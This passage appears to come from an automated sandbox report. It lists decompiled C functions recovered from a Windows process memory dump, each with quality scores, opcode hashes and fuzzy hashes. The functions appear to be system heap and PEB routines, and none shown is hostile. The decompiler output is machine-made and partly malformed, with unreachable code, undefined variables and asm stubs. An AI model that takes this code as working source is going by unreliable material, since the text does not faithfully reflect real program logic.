        __eflags = *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
        if(__eflags == 0) {
            goto L10;
        }
        goto L9;
    } else {
        return 1;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b
                                                                            • Instruction ID: 981445853d576c58f84d15a742f046b39275e47bfa0e4e42235f00307f098d08
                                                                            • Opcode Fuzzy Hash: 58407a09824562d18bce48bc40b1dbc448dbef56508518bf67eb31326dc9f96b
                                                                            • Instruction Fuzzy Hash: A7F0FAB29113909EF7B6832CC304B227FE99B15230FC484AED5C78320AC2A0CCC0C240
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 43%
E01188D34(intOrPtr __ecx, intOrPtr __edx) {
    signed int _v8;
    intOrPtr _v12;
    intOrPtr _v16;
    short _v42;
    char _v48;
    signed char* _t12;
    intOrPtr _t18;
    intOrPtr _t24;
    intOrPtr _t25;
    signed int _t26;

    _t23 = __edx;
    _v8 =  *0x11ad360 ^ _t26;
    _v16 = __ecx;
    _v42 = 0x1c2b;
    _v12 = __edx;
    if(E010D7D50() == 0) {
        _t12 = 0x7ffe0386;
    } else {
        _t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
    }
    _push( &_v48);
    _push(8);
    _push(0x20402);
    _push( *_t12 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4
                                                                            • Instruction ID: 1f11f62917d4992e1097d4d70fc4940e43d50479398dab61051c2cacc348bb19
                                                                            • Opcode Fuzzy Hash: f03a51043f15ca0082633dfa47f0d9dd4eec0d298471cddbcf172c27ed12efc4
                                                                            • Instruction Fuzzy Hash: A4F0B470A046099FDB18FFB8D442BAE77B4EF18300F508099E905EB280DA34D900CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
E01172073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
    void* __esi;
    signed char _t3;
    signed char _t7;
    void* _t19;

    _t17 = __ecx;
    _t3 = E0116FD22(__ecx);
    _t19 =  *0x11a849c - _t3; // 0x0
    if(_t19 == 0) {
        __eflags = _t17 -  *0x11a8748; // 0x0
        if(__eflags <= 0) {
            E01171C06();
            _t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
            __eflags = _t3;
            if(_t3 != 0) {
                L5:
                __eflags =  *0x11a8724 & 0x00000004;
                if(( *0x11a8724 & 0x00000004) == 0) {
                    asm("int3");
                    return _t3;
                }
            } else {
                _t3 =  *0x7ffe02d4 & 0x00000003;
                __eflags = _t3 - 3;
                if(_t3 == 3) {
                    goto L5;
                }
            }
        }
        return _t3;
    } else {
        _t7 =  *0x11a8724; // 0x0
        return E01168DF1(__ebx, 0xc0000374, 0x11a5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9
                                                                            • Instruction ID: 281ca65f7a94d39df30790406e616d3031726d526b571237e82ad0eb53bc669b
                                                                            • Opcode Fuzzy Hash: 9c08e0ea59aa0cc7e532668b62d336ec8acc5efc4aa9fcee55bec7cd49f08ca9
                                                                            • Instruction Fuzzy Hash: B9F0552A4256954ADF3F6B6C31003E93FB6E765114F890095D4B05730AC73589E3CB30
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 54%
E010F927A(void* __ecx) {
    signed int _t11;
    void* _t14;

    _t11 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
    if(_t11 != 0) {
        E010FFA60(_t11, 0, 0x98);
        asm("movsd");
        asm("movsd");
        asm("movsd");
        asm("movsd");
        *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
        *((intOrPtr*)(_t11 + 0x24)) = 1;
        E010F92C6(_t11, _t14);
    }
    return _t11;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                            • Instruction ID: 117ae490dcadaa3505000fcbe5955b464e9c7050113f6f08a4d54995f5d3a0bc
                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                            • Instruction Fuzzy Hash: 89E0ED322406016BE7619F0ACC81B8736A9AF92724F04407CBA005E282CAE6D80887A0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 88%
E010D746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
    signed int _t8;
    void* _t10;
    short* _t17;
    void* _t19;
    intOrPtr _t20;
    void* _t21;

    _t20 = __esi;
    _t19 = __edi;
    _t17 = __ebx;
    if( *((char*)(_t21 - 0x25)) != 0) {
        if(__ecx == 0) {
            E010CEB70(__ecx, 0x11a79a0);
        } else {
            asm("lock xadd [ecx], eax");
            if((_t8 | 0xffffffff) == 0) {
                _push( *((intOrPtr*)(__ecx + 4)));
                E010F95D0();
                L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                _t17 =  *((intOrPtr*)(_t21 - 0x2c));
                _t20 =  *((intOrPtr*)(_t21 - 0x3c));
            }
        }
        L10:
    }
    _t10 = _t19 + _t19;
    if(_t20 >= _t10) {
        if(_t19 != 0) {
            *_t17 = 0;
            return 0;
        }
    }
    return _t10;
    goto L10;
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5d7cc1a88e1ca77860ca0fd75f50f495c1a60377072bba0ec5909c1fc3a7ba38
                                                                            • Instruction ID: f647a5c1f93074b66a5ca9a08b4f9e4aefbc0b621b691aa553ff8268a4e17c1e
                                                                            • Opcode Fuzzy Hash: 5d7cc1a88e1ca77860ca0fd75f50f495c1a60377072bba0ec5909c1fc3a7ba38
                                                                            • Instruction Fuzzy Hash: 01F0E934505345AADF4BA77CC440BBDBFB1AF04618F540159E5D1AB151FF259801CBD5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 36%
E01188CD6(intOrPtr __ecx) {
    signed int _v8;
    intOrPtr _v12;
    short _v38;
    char _v44;
    signed char* _t11;
    intOrPtr _t17;
    intOrPtr _t22;
    intOrPtr _t23;
    intOrPtr _t24;
    signed int _t25;

    _v8 =  *0x11ad360 ^ _t25;
    _v12 = __ecx;
    _v38 = 0x1c2d;
    if(E010D7D50() == 0) {
        _t11 = 0x7ffe0386;
    } else {
        _t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
    }
    _push( &_v44);
    _push(0xffffffe4);
    _push(0x402);
    _push( *_t11 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1c52a5286224be70bc76f304bb5248934f8ce295eef9b1784780dc9285ec4798
                                                                            • Instruction ID: 1fb3f7ece1e8164de89789703d3d41535894551e7aa3bcdbcdf1311e2fa57507
                                                                            • Opcode Fuzzy Hash: 1c52a5286224be70bc76f304bb5248934f8ce295eef9b1784780dc9285ec4798
                                                                            • Instruction Fuzzy Hash: 8AF08270A04609ABDB08EFA9E946EAE77B4EF19204F504199F955EB281EA34D900CB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E010B4F2E(void* __ecx, char _a4) {
    void* __esi;
    void* __ebp;
    void* _t17;
    void* _t19;
    void* _t20;
    void* _t21;

    _t18 = __ecx;
    _t21 = __ecx;
    if(__ecx == 0) {
        L6:
        __eflags = _a4;
        if(__eflags != 0) {
            L8:
            E011888F5(_t17, _t18, _t19, _t20, _t21, __eflags);
            L9:
            return 0;
        }
        __eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
        if(__eflags != 0) {
            goto L9;
        }
        goto L8;
    }
    _t18 = __ecx + 0x30;
    if(E010DC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1091030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
        goto L6;
    } else {
        return 1;
    }
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6013b5f22246eb93b990cb8c288f11811b41c5c85242ef2275ae7416453f6167
                                                                            • Instruction ID: 5bb0655377b85e6ce4f9538037c24b2fdb24d9959ccc1c45c9fb94b912e7fef7
                                                                            • Opcode Fuzzy Hash: 6013b5f22246eb93b990cb8c288f11811b41c5c85242ef2275ae7416453f6167
                                                                            • Instruction Fuzzy Hash: B6F0BE7A9216858FE766DB1CC184B22F7D4BB08678F444476E4468792AC764EDC0C648
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 36%
E01188B58(intOrPtr __ecx) {
    signed int _v8;
    intOrPtr _v20;
    short _v46;
    char _v52;
    signed char* _t11;
    intOrPtr _t17;
    intOrPtr _t22;
    intOrPtr _t23;
    intOrPtr _t24;
    signed int _t25;

    _v8 =  *0x11ad360 ^ _t25;
    _v20 = __ecx;
    _v46 = 0x1c26;
    if(E010D7D50() == 0) {
        _t11 = 0x7ffe0386;
    } else {
        _t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
    }
    _push( &_v52);
    _push(4);
    _push(0x402);
    _push( *_t11 & 0x000000ff);
    return E010FB640(E010F9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
}


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 330dae247d316f77e38e4f0d6024741392904a2846d8bcc07bd70ee43a5b518d
                                                                            • Instruction ID: 6b195f5735be14242b5ba5e2d251956f1215445196e0d32ebe388a070788aad2
                                                                            • Opcode Fuzzy Hash: 330dae247d316f77e38e4f0d6024741392904a2846d8bcc07bd70ee43a5b518d
                                                                            • Instruction Fuzzy Hash: A7F082B0A14259AFDB14FBA8D906EBE77B4EF44304F440459BA05DB380EB34D900CB94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010EA44B(signed int __ecx) { 				intOrPtr _t13; 				signed int _t15; 				signed int* _t16; 				signed int* _t17;  				_t13 =  *0x11a7b9c; // 0x0 				_t15 = __ecx; 				_t16 = L010D4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4); 				if(_t16 == 0) { 					return 0; 				} 				 *_t16 = _t15; 				_t17 =  &(_t16[2]); 				E010FFA60(_t17, 0, _t15 << 2); 				return _t17; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 056ba05a71be4001a7c7ce54cb810d5a766245bc5675eab8ae256c3ee4272f29
                                                                            • Instruction ID: f868d16a484387b39f5c6fce61eccd98d23e67a03845065cc71ba564715db44e
                                                                            • Opcode Fuzzy Hash: 056ba05a71be4001a7c7ce54cb810d5a766245bc5675eab8ae256c3ee4272f29
                                                                            • Instruction Fuzzy Hash: 47E092B3B01422ABD2225B19AC00FA7779DDBE8651F0A4039E645C7254DA68DD11C7E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E010BF358(void* __ecx, signed int __edx) { 				char _v8; 				signed int _t9; 				void* _t20;  				_push(__ecx); 				_t9 = 2; 				_t20 = 0; 				if(E010EF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) { 					_t20 = L010D4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8); 				} 				return _t20; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                            • Instruction ID: 7b9e5aa0dd71b4881ed11490106dd38aa7bf717ee7b3d7e098e362e6bb6a614c
                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                            • Instruction Fuzzy Hash: 63E0DF32A41219FBDB21AAD99E05FEABFACDB58EA0F008195BA08D7150D5719E00C3D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010CFF60(intOrPtr _a4) { 				void* __ecx; 				void* __ebp; 				void* _t13; 				intOrPtr _t14; 				void* _t15; 				void* _t16; 				void* _t17;  				_t14 = _a4; 				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10911a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) { 					return E011888F5(_t13, _t14, _t15, _t16, _t17, __eflags); 				} else { 					return E010D0050(_t14); 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4534b63a5abd21eda98c6d9de94218d0608a036be47f821618dd891fc4170773
                                                                            • Instruction ID: e0e8845e4e7f0e48dfdffd6efc9d92e910f1729fcbd36f234b39b0a62c75c90b
                                                                            • Opcode Fuzzy Hash: 4534b63a5abd21eda98c6d9de94218d0608a036be47f821618dd891fc4170773
                                                                            • Instruction Fuzzy Hash: 81E0DFB0205207AFDB3ADB59D050F2D3BDADF52A21F19809DF0884B102C661DA82CE8B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
                                                                                                                                  E011441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) { 				void* _t5; 				void* _t14;  				_push(8); 				_push(0x11908f0); 				_t5 = E0110D08C(__ebx, __edi, __esi); 				if( *0x11a87ec == 0) { 					E010CEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); 					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000; 					if( *0x11a87ec == 0) { 						 *0x11a87f0 = 0x11a87ec; 						 *0x11a87ec = 0x11a87ec; 						 *0x11a87e8 = 0x11a87e4; 						 *0x11a87e4 = 0x11a87e4; 					} 					 *(_t14 - 4) = 0xfffffffe; 					_t5 = L01144248(); 				} 				return E0110D0D1(_t5); 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88d10b3370d91d677a367d5865f40cd22940c83a4ad393227719a45bfc51f3ba
                                                                            • Instruction ID: 33d5459bd4d2bf0895f4e0b835d4e5f6e60823e332402940e8e768e334f7db6f
                                                                            • Opcode Fuzzy Hash: 88d10b3370d91d677a367d5865f40cd22940c83a4ad393227719a45bfc51f3ba
                                                                            • Instruction Fuzzy Hash: 79F01EB8920B01CFCBB9EFE9E600B183EB4F754B26F80813A9124876C8C77449A0CF01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E0116D380(void* __ecx, void* __edx, intOrPtr _a4) { 				void* _t5;  				if(_a4 != 0) { 					_t5 = L010BE8B0(__ecx, _a4, 0xfff); 					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4); 					return _t5; 				} 				return 0xc000000d; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                            • Instruction ID: e8ff122ecaec2a627f07028cfa0a3501701b69d8df5e33e0556ac71943719a0d
                                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                            • Instruction Fuzzy Hash: A0E0C231384605BBDF265E84DC00FE9BB1AEF607A0F114031FE885A690C7729CA1D6C4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010EA185() { 				void* __ecx; 				intOrPtr* _t5;  				if( *0x11a67e4 >= 0xa) { 					if(_t5 < 0x11a6800 || _t5 >= 0x11a6900) { 						return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5); 					} else { 						goto L1; 					} 				} else { 					L1: 					return E010D0010(0x11a67e0, _t5); 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f27ae7112b6067a133fe9a6158815d5539e0568f654f25e5087cfdc5714021e4
                                                                            • Instruction ID: d37abd5328afb2c953ef3129cf07f4fe401f2bd2e5d33f6daf8bfe6c0ca70616
                                                                            • Opcode Fuzzy Hash: f27ae7112b6067a133fe9a6158815d5539e0568f654f25e5087cfdc5714021e4
                                                                            • Instruction Fuzzy Hash: 04D02BB12311009EC62D13418E18BA53E52F7C8760F7E884CF2974B594EB50C8D0C109
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010E16E0(void* __edx, void* __eflags) { 				void* __ecx; 				void* _t3;  				_t3 = E010E1710(0x11a67e0); 				if(_t3 == 0) { 					_t6 =  *[fs:0x30]; 					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) { 						goto L1; 					} else { 						return L010D4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20); 					} 				} else { 					L1: 					return _t3; 				} 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 569fb779723998ea439eee7248039834d29ccc64a3e77f90b1bc1072409dd6ef
                                                                            • Instruction ID: 9bc36db5fbba4a02299cf603fd5bfaf92f5a9f56322d39ea2f55b230f1559412
                                                                            • Opcode Fuzzy Hash: 569fb779723998ea439eee7248039834d29ccc64a3e77f90b1bc1072409dd6ef
                                                                            • Instruction Fuzzy Hash: B7D0A771341201AAEA2D5F16AC48B142AE1EB98B81F38009CF247598D0CFB0CC93E44C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E011353CA(void* __ebx) { 				intOrPtr _t7; 				void* _t13; 				void* _t14; 				intOrPtr _t15; 				void* _t16;  				_t13 = __ebx; 				if( *((char*)(_t16 - 0x65)) != 0) { 					E010CEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c))); 					_t7 =  *((intOrPtr*)(_t16 - 0x64)); 					_t15 =  *((intOrPtr*)(_t16 - 0x6c)); 				} 				if(_t15 != 0) { 					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15); 					return  *((intOrPtr*)(_t16 - 0x64)); 				} 				return _t7; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                            • Instruction ID: 19bc3688cf97e893e4440b67c673143cf9bca4e5e664026c3fec8240d33d206f
                                                                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                            • Instruction Fuzzy Hash: 8CE08C329047809BCF16DB48C650F9EBBF6FB84B00F150408A0485B620C734AC00CB00
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010E35A1(void* __eax, void* __ebx, void* __ecx) { 				void* _t6; 				void* _t10; 				void* _t11;  				_t10 = __ecx; 				_t6 = __eax; 				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) { 					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1; 				} 				if( *((char*)(_t11 - 0x1a)) != 0) { 					return E010CEB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c))); 				} 				return _t6; 			}                        


                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                            • Instruction ID: 7870e4ac30e6ed1d4d959c1a0eb35a57d1c8cacf41f44b699e06b49e626b1a62
                                                                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                                            • Instruction Fuzzy Hash: F7D0C9335511859EEB92AB55C21C7BDBFF2BB00718F5820A995C60FA52C33A4A5ADA01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                                                                                  E010CAAB0() { 				intOrPtr* _t4;  				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50)); 				if(_t4 != 0) { 					if( *_t4 == 0) { 						goto L1; 					} else { 						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e; 					} 				} else { 					L1: 					return 0x7ffe0030; 				} 			}                        

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E0113A537(intOrPtr _a4, intOrPtr _a8) {
                                                                                return L010D8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010BDB40() {
                                                                                signed int* _t3;
                                                                                void* _t5;

                                                                                _t3 = L010D4620(_t5, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                                if(_t3 == 0) {
                                                                                    return 0;
                                                                                } else {
                                                                                    *_t3 = *_t3 | 0x00000400;
                                                                                    return _t3;
                                                                                }
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            E010BAD30(intOrPtr _a4) {
                                                                                return L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                            }

                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                                            • Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp
                                                                            • Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp
                                                                            Uniqueness

